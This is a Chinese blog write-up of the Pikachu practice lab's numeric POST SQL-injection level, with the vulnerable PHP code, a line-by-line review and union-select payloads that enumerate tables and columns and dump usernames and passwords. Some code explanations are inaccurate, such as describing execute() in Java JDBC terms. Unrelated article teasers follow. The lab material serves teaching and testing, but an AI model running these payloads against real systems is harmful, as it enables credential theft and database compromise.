pikachu靶场第十六关——sqli数字型注入(post)(附代码审计)

devtools/2024/12/22 18:25:34/

Sql Inject(SQL注入)概述

        在owasp发布的top10排行榜里,注入漏洞一直是危害排名第一的漏洞,其中注入漏洞里面首当其冲的就是数据库注入漏洞。
一个严重的SQL注入漏洞,可能会直接导致一家公司破产!
SQL注入漏洞主要形成的原因是在数据交互中,前端的数据传入到后台处理时,没有做严格的判断,导致其传入的“数据”拼接到SQL语句中后,被当作SQL语句的一部分执行。 从而导致数据库受损(被脱裤、被删除、甚至整个服务器权限沦陷)。

在构建代码时,一般会从如下几个方面的策略来防止SQL注入漏洞:
1.对传进SQL语句里面的变量进行过滤,不允许危险字符传入;
2.使用参数化(Parameterized Query 或 Parameterized Statement);
3.还有就是,目前有很多ORM框架会自动使用参数化解决注入问题,但其也提供了"拼接"的方式,所以使用时需要慎重!

源代码:

if(isset($_POST['submit']) && $_POST['id']!=null){//这里没有做任何处理,直接拼到select里面去了,形成Sql注入$id=$_POST['id'];$query="select username,email from member where id=$id";$result=execute($link, $query);//这里如果用==1,会严格一点if(mysqli_num_rows($result)>=1){while($data=mysqli_fetch_assoc($result)){$username=$data['username'];$email=$data['email'];$html.="<p class='notice'>hello,{$username} <br />your email is: {$email}</p>";}}else{$html.="<p class='notice'>您输入的user id不存在,请重新输入!</p>";}
}

我们一行一行来看

if(isset($_POST['submit']) && $_POST['id']!=null)

        判断输入的id是否为空,判断按键是否按下

 $id=$_POST['id'];

定义了一个函数id,并将输入的id的值保存在了里面。

$query="select username,email from member where id=$id";

这是查询函数,也就是一会要执行的命令,即从username、email表中查询id为$id的值。

漏洞就是在这里产生的。

从输入到查询,并没有进行过任何的处理,这就相当于将数据库的查询权限开放给了所有人。

我们一会将说,接着看吧。

$result=execute($link, $query);

execute():几乎可以执行任何SQL语句,返回值是boolean值,表明该SQL语句是否返回ResultSet对象

boolean值:

true:使用getResultSet()方法获取返回的ResultSet对象
false:使用getUpdateCount()方法获取返回所影响的行数

if(mysqli_num_rows($result)>=1)

mysql_num_rows是PHP语言的中的函数,其表示取得结果集中行的数目。

若是大于等于1,则执行后续代码

 while($data=mysqli_fetch_assoc($result))

mysql_fetch_assoc是一个计算机函数,功能是从结果集中取得一行作为关联数组。返回根据从结果集取得的行生成的关联数组,如果没有更多行,则返回 false。

后面的代码就不细说了。

让我们来看看怎么拿下这个漏洞!

试了一下,网页上只能选择选项。

抓包看看。

ok,试着在id处将查询语句闭合了。

先试试单引号。

$query="select username,email from member where id=$id";

失败了吗?并没有,我们已经成功在后台执行了一次查询,只是报错了,因为数据库里没有标号为1' 的值。

让我们看看能不能输入命令,最简单的就是判断1=1

成功了!

ok,我们开始将深入了!

order by x(数字) 正常与错误的正常值 正确网页正常显示,错误网页报错

现在我们知道了字段长度为二,接下来可以用联合注入查询

利用 union select 联合查询,即可探测到可利用的字段数

id=1 union select 1,2 --+

id=1 union select database(),version() --+

不想看到上面这一条的,可以将id改为-1。

?id=1 union select 1,group_concat(table_name) from information_schema.tables where table_schema='pikachu'--+

?id=1 union select 1,group_concat(column_name) from information_schema.columns where table_name='users'--+

?id=1 union select 1,group_concat(username,':',password) from pikachu.users--+

就酱!


http://www.ppmy.cn/devtools/2011.html

相关文章

GAN:对抗式生成网络之图片生成

对抗式生成网络(Adversarial Generative Network, AGN)这一术语在您提供的信息中并未直接出现。通常,在深度学习文献和实践中,与“对抗”和“生成”概念相结合的网络架构指的是生成式对抗网络(Generative Adversarial Networks, GANs)。GANs由Ian Goodfellow等人于2014年…

面试算法-174-二叉树的层序遍历

题目 给你二叉树的根节点 root &#xff0c;返回其节点值的 层序遍历 。 &#xff08;即逐层地&#xff0c;从左到右访问所有节点&#xff09;。 示例 1&#xff1a; 输入&#xff1a;root [3,9,20,null,null,15,7] 输出&#xff1a;[[3],[9,20],[15,7]] 解 class Solut…

MapReduce——数据切片与MapTask并行度决定机制

MapReduce——数据切片与MapTask并行度决定机制 MapReduce 数据切片和 Map 任务的并行度决定机制是 MapReduce 框架中两个重要的概念&#xff0c;它们直接影响作业的执行效率和性能。 1.数据切片&#xff08;Data Splits&#xff09; 数据切片是指将输入数据拆分成更小的块或片…

使用go和消息队列优化投票功能

文章目录 1、优化方案与主要实现代码1.1、原系统的技术架构1.2、新系统的技术架构1.3、查看和投票接口实现1.4、数据入库MySQL协程实现1.5、路由配置1.6、启动程序入口实现 2、压测结果2.1、设置Jmeter线程组2.2、Jmeter聚合报告结果&#xff0c;支持11240/秒吞吐量2.3、Jmeter…

vscode 配置go环境

https://www.zhihu.com/question/486786946/answer/2723663432 注意一定要安装最新版,否则不容易debug //main.go package main //说明hello.go这个文件在main这个包中import "fmt" //导入内置包&#xff0c;可以使用其中函数等func main() {fmt.Println("Hello…

自然语言处理NLP:文本预处理Text Pre-Processing

大家好&#xff0c;自然语言处理(NLP)是计算机科学领域与人工智能领域中的一个重要方向&#xff0c;其研究能实现人与计算机之间用自然语言进行有效通信的各种理论和方法。本文将介绍文本预处理的本质、原理、应用等内容&#xff0c;助力自然语言处理和模型的生成使用。 1.文本…

C++11的更新介绍(lamada、包装器)

&#x1fa90;&#x1fa90;&#x1fa90;欢迎来到程序员餐厅&#x1f4ab;&#x1f4ab;&#x1f4ab; 主厨&#xff1a;邪王真眼 主厨的主页&#xff1a;Chef‘s blog 所属专栏&#xff1a;c大冒险 总有光环在陨落&#xff0c;总有新星在闪烁 lambda表达式 C98中的一个…

C++格式化输出开源库fmt入手教程

fmt项目快速上手指南 1. cmake环境配置 include(FetchContent) FetchContent_Declare(fmtGIT_REPOSITORY https://github.com/fmtlib/fmtGIT_TAG 10.0.0GIT_SHALLOW TRUE) # 1. 下载fmt库 FetchContent_MakeAvailable(fmt)add_executable(fmt_guide main.cpp) # 2. 链接fmt库…